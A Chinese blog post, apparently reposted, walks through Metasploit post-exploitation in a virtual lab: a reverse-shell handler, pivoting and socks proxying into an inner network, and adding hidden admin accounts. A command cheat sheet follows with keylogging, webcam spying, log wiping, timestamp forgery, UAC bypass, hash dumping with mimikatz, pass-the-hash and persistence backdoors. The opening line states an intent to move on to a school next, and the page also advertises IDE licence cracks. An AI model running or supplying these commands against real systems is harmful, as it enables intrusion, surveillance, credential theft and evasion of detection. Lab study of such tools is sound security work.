msfconsole是什么意思_msfconsole渗透手机

msfconsole是什么意思_msfconsole渗透手机先模拟多层内网,摸清后渗透的使用,再从学校入手。内网渗透test网络拓扑以kali为攻击机,xp作为跳板主机,win7是内网主机xp主机是提供web,FTP等服务,已被kali机获取shellwin7正常不与外网访问,和DMZ区域处于同一网段环境搭建使用VMware的主机模式,构建虚拟局域网。查看Host-only模式详解虚拟网络编译器中添加两块网卡vm1,vm2。类型:主…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

先模拟多层内网,摸清后渗透的使用,再从学校入手。
内网渗透test


网络拓扑

msfconsole是什么意思_msfconsole渗透手机

以kali为攻击机,xp作为跳板主机,win7是内网主机

xp主机是提供web,FTP等服务,已被kali机获取shell

win7正常不与外网访问,和DMZ区域处于同一网段

环境搭建

使用VMware的主机模式,构建虚拟局域网。查看Host-only模式详解

虚拟网络编译器中添加两块网卡vm1,vm2。 类型:主机模式
msfconsole是什么意思_msfconsole渗透手机

设置xp为双网卡vm1,vm2。其余按网络拓扑分配网卡

msfconsole是什么意思_msfconsole渗透手机

查看ip

kali
msfconsole是什么意思_msfconsole渗透手机

xp
msfconsole是什么意思_msfconsole渗透手机

win7
msfconsole是什么意思_msfconsole渗透手机

至此环境布置完毕

拿下跳板以及端口转发

以社工等方法获取到xp主机的shell
通过metasploit会话,使用Windows xp靶机作为跳板,扫描和攻击内部网络主机

#kali msf
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.252.128
lhost => 192.168.252.128
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.252.128:4444 
[*] Sending stage (180291 bytes) to 192.168.252.130
[*] Meterpreter session 1 opened (192.168.252.128:4444 -> 192.168.252.130:1814) at 2019-11-16 12:44:58 +0800

meterpreter > ifconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1


Interface  2
============
Name         : AMD PCNET Family PCI Ethernet Adapter - rface
Hardware MAC : 00:0c:29:dd:e6:94
MTU          : 1500
IPv4 Address : 192.168.85.129
IPv4 Netmask : 255.255.255.0


Interface  3
============
Name         : VMware Accelerated AMD PCNet Adapter - rface
Hardware MAC : 00:0c:29:dd:e6:9e
MTU          : 1500
IPv4 Address : 192.168.252.130
IPv4 Netmask : 255.255.255.0

可以看到xp是双网卡,发现另一内网段 192.168.85.0/24。

对该内网进行渗透

  1. 添加内网的路由

    meterpreter > run autoroute -s 192.168.85.0/24    #添加目标网段路由规则,获取内部网络访问通道
    meterpreter > route flush  #不用的时候,记得删掉就行
    

    msfconsole是什么意思_msfconsole渗透手机

  2. 扫描内网主机

    meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.85.0/24 #arp扫描粗略的扫一眼目标内网的机器大概有多少
    

    发现 192.168.85.128的主机

    msfconsole是什么意思_msfconsole渗透手机

  3. socks代理

    #利用sock4a模块对目标内网代理,只能负责tcp的流量,并不是socks代理进去以后就什么都能搞了
    meterpreter > background
    msf exploit(handler) > use auxiliary/server/socks4a 
    msf auxiliary(socks4a) > set srvhost 127.0.0.1
    msf auxiliary(socks4a) > set srvport 1111
    msf auxiliary(socks4a) > run
    

    msfconsole是什么意思_msfconsole渗透手机

    在proxychians.conf中设置好代理,就可以对目标进行正常的内网渗透了

    vi /etc/proxychains.conf
    #在文件末尾添加socks4代理服务器
    

    msfconsole是什么意思_msfconsole渗透手机

    利用proxychains代理扫描并执行nmap操作

    proxychains nmap -Pn -sT 192.168.85.0/24 -p1-100
    

    msfconsole是什么意思_msfconsole渗透手机

    1. 发现存在80端口,google配置代理

    msfconsole是什么意思_msfconsole渗透手机

    查看
    msfconsole是什么意思_msfconsole渗透手机

获取内网win7的shell

  1. 使用任意文件上传,获取路径

    msfconsole是什么意思_msfconsole渗透手机

  2. 这里使用蚁剑连接

    msfconsole是什么意思_msfconsole渗透手机

  3. 可以看到win7 开启了3389端口
    msfconsole是什么意思_msfconsole渗透手机

  4. 这里开启并使用远程桌面

    # 创建新的管理员账户(直接更改管理员密码 net user Administrator 123)
    whoami
    net user
    net user wk 123 /add
    net localgroup administrators wk /add   #wk加入管理员账户
    
    # 使用远程桌面
    portfwd add -l 2222 -p 3389 -r 127.0.0.1  #先将3389流量转发到代理服务器
    rdesktop 127.0.0.1:2222     #kali自带rdesktop
    
    
    

    权限为系统权限

    msfconsole是什么意思_msfconsole渗透手机

    msfconsole是什么意思_msfconsole渗透手机

    我这里出现错误,下载的win 7的系统有问题,但是此时的用户是正常使用的。
    msfconsole是什么意思_msfconsole渗透手机

    msfconsole是什么意思_msfconsole渗透手机

    到此时,接下来的操作大家都懂的!

常用命令总结

execute执行文件

execute #在目标机中执行文件
execute -H -i -f  cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt"
# -d 在目标主机执行时显示的进程名称(用以伪装)-m 直接从内存中执行
"-o hack.txt"是payload.exe的运行参数

migrate进程迁移

getpid    # 获取当前进程的pid
ps   # 查看当前活跃进程
migrate <pid值>    # 将Meterpreter会话移植到指定pid值进程中
kill <pid值>   # 杀死进程

clearev清除日志

clearev  # 清除windows中的应用程序日志、系统日志、安全日志

timestomp伪造时间戳

timestomp C:\\ -h   #查看帮助
timestomp -v C:\\2.txt   #查看时间戳
timestomp C:\\2.txt -f C:\\1.txt #将1.txt的时间戳复制给2.txt
timestomp  c:\\test\\22.txt -z "03/10/2019 11:55:55" -v # 把四个属性设置为统一时间

portfwd端口转发

portfwd add -l 1111 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地1111端口
rdesktop 127.0.0.1:1111 # 需要输入用户名密码连接
rdesktop -u Administrator -p 123 127.0.0.1:1111 # -u 用户名 -p 密码

autoroute添加路由

run autoroute -h # 查看帮助
run get_local_subnets # 查看目标内网网段地址
run autoroute -s 192.168.183.0/24  # 添加目标网段路由
run autoroute -p  # 查看添加的路由

利用arp_scanner、portscan等进行扫描

run post/windows/gather/arp_scanner RHOSTS=192.168.183.0/24
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.183.146 PORTS=3389

Socks代理

use auxiliary/server/socks4a
set srvhost 127.0.0.1
set srvport 2000
run
# 然后vim /etc/proxychains.conf ,在文件末尾添加socks4代理服务器
socks4 127.0.0.1 2000
proxychains nmap -Pn -sT 192.168.80.129 -p1-1000   #proxychains代理访问执行nmap操作

键盘记录

keyscan_start  # 开始键盘记录
keyscan_dump   # 导出记录数据
keyscan_stop   # 结束键盘记录

网络摄像头

record_mic  # 音频录制
webcam_chat  # 开启视频聊天(对方有弹窗)
webcam_list  # 查看摄像头
webcam_snap  # 通过摄像头拍照
webcam_stream  # 通过摄像头开启视频监控(以网页形式进行监控≈直播)

截屏

screenshot  # 截屏
use espia  # 使用espia模块
screengrab  # 截屏

绕过UAC提权

msf内置一些bypassuac脚本,原理不同,使用方法类似,执行后返回一个新的会话,执行getsystem即可提权

exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_eventvwr
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_injection_winsxs
exploit/windows/local/bypassuac_silentcleanup
exploit/windows/local/bypassuac_vbs

use exploit/windows/local/bypassuac
set session 1
run
getsystem

窃取hash及密码&哈希传递

# 窃取hash及密码
hashdump
run post/windows/gather/smart_hashdump
得到的hash可以拿去https://cmd5.com/ 解密一下即是用户密码


#mimikatz
load mimikatz # 加载mimikatz模块
msv  # 获取用户和hash值 
kerberos  # 获取内存中的明文密码信息
wdigest  # 获取内存中的明文密码信息
mimikatz_command -f a:: # 需要以错误的模块来让正确的模块显示
mimikatz_command -f sekurlsa::searchPasswords # 获取用户密码
mimikatz_command -f samdump::hashes  # 执行用户hash

#哈希传递
#利用hashdump得到用户的hash后可利用psexec模块进行哈希传递攻击。
使用psexec的前提:SMB服务必须开启,也就是开启445端口;Admin$可以访问
use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.183.147
set LPORT 443
set RHOST 192.168.183.154
set SMBUSER Administrator
set SMBPASS ccf**4ee:3db**678
set SMBDOMAIN  WORKGROUP   # 域用户需要设置SMBDOMAIN
run

RDP

#getgui命令
#这里需要注意的是通过getgui命令,虽然可以成功添加用户,但是没有权限远程登录桌面,这里推荐使用enable_rdp脚本添加。
run getgui –h  # 查看帮助
run getgui -e  # 开启远程桌面
run getgui -u admin -p admin  # 添加用户
run getgui -f 6666 -e  # 3389端口转发到6666


#enable_rdp脚本
#通过enable_rdp脚本将用户添加到远程桌面用户组和管理员用户组
run post/windows/manage/enable_rdp  #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=admin PASSWORD=admin # 添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6667  # 将3389端口转发到6667

#远程桌面
enumdesktops  # 查看可用的桌面
getdesktop    # 获取当前meterpreter 关联的桌面
setdesktop    # 设置meterpreter关联的桌面  -h查看帮助
run vnc   # 使用vnc远程桌面连接
rdesktop 127.0.0.1:1111 # 需要输入用户名密码连接
rdesktop -u Administrator -p 123 127.0.0.1:1111 # -u 用户名 -p 密码

后门植入

# Persistence(通过启动项安装)
run persistence –h  # 查看帮助
run persistence -X -i 5 -p 4444 -r 192.168.183.147 
run persistence -U -i 5 -p 4444 -r 192.168.183.147 -L c:\\Windows\\System32
-X:设置后门在系统启动后自启动。该方式会在HKLM\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。由于权限原因会导致添加失败,后门无法启动。因此在非管理员权限下,不推荐使用该参数
-U:设置后门在用户登录后自启动。该方式会在HKCU\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息
-L:后门传到远程主机的位置默认为%TEMP%
-i:设置反向连接间隔时间为5秒
-p:设置反向连接的端口号
-r:设置反向连接的ip地址

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/196236.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • 批处理 for命令_文件批处理命令

    批处理 for命令_文件批处理命令对所有的批处理初学者来说,for的应用是最难理解以及掌握的。本文由浅入深,为大家专门讲解for的用法,希望大家喜欢。首先应该明确的是,for不是一个简单的命令,它的用法比较复杂,它还可以带四个参数(/L/D/R/F),其中:/L和/F参数是最经常用到的。当然,它本身也可以不带参数,下面我们通过具体的例子来讲解for的运用。一、不带参数的for:@echo

    2022年10月12日
    0
  • 闫学灿acwing_acwing算法基础

    闫学灿acwing_acwing算法基础1 2 3 4 5 6 7 ############################# 1 # | # | # | | # #####—#####—#—#####—# 2 # # | # # # # # #—#####—#####—#####—# 3 # | | # # # # # #—#########—#####–…

    2022年8月8日
    4
  • ❤️爆肝3万字,最硬核丨Mysql 知识体系、命令全集 【建议收藏 】❤️

    ❤️爆肝3万字,最硬核丨Mysql 知识体系、命令全集 【建议收藏 】❤️Mysql知识体系、命令全集

    2022年8月22日
    7
  • java浅拷贝和深拷贝的区别_js中深拷贝和浅拷贝的区别

    java浅拷贝和深拷贝的区别_js中深拷贝和浅拷贝的区别最近用到了clone方法,并且遭遇到各种奇怪的bug;一,浅拷贝浅拷贝:对基本类型的数据是值拷贝,对String类型的拷贝也可以看作是值拷贝,这里不做讨论;浅拷贝是什么呢,先上一段代码,对着看代码很容易理解: Vector&lt;Vector&gt;data=newVector&lt;Vector&gt;(); for(inti=0;i&lt;4;i++){ …

    2022年10月1日
    0
  • IOS版的MT4软件如何下载安装「建议收藏」

    IOS版的MT4软件如何下载安装「建议收藏」T4的版本总体来说还是比较全。包含了电脑版、安卓版/ios版,以及mac版。那么今天来重点讲解一下IOS版本的mt4如何下载。下载方式主要分以下2种:(1)在网页上获取安装包,通常mt4。yhtz。cc涵盖了多个版本的安装包,选择你需要的IOS即可下载到手机上后,然后就进入安装流程,点击下一步,下一步,总体来说,就是跟着安装提示走即可。(2)IOS属于手机版,IOS是可以在苹果应用商店下载的。下载流程就是:搜索Mt4,然后点击下载,一般会自动安装哦,就跟下载其他的客户端是一样的。下载安装好后

    2022年8月15日
    1
  • resnet18 pytorch_pytorch全连接层

    resnet18 pytorch_pytorch全连接层创建各版本的ResNet模型,ResNet18,ResNet34,ResNet50,ResNet101,ResNet152原文地址:https://arxiv.org/pdf/1512.03385.pdf论文就不解读了,大部分解读都是翻译,看的似懂非懂,自己搞懂就行了。最近想着实现一下经典的网络结构,看了原文之后,根据原文代码结构开始实现。起初去搜了下各种版本的实现,发现很多博客都是错误百出,有些博文都发布几年了,错误还是没人发现,评论区几十号人不知道是真懂还是装懂,颇有些无奈啊。因此打算自己手动实

    2022年10月7日
    0

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号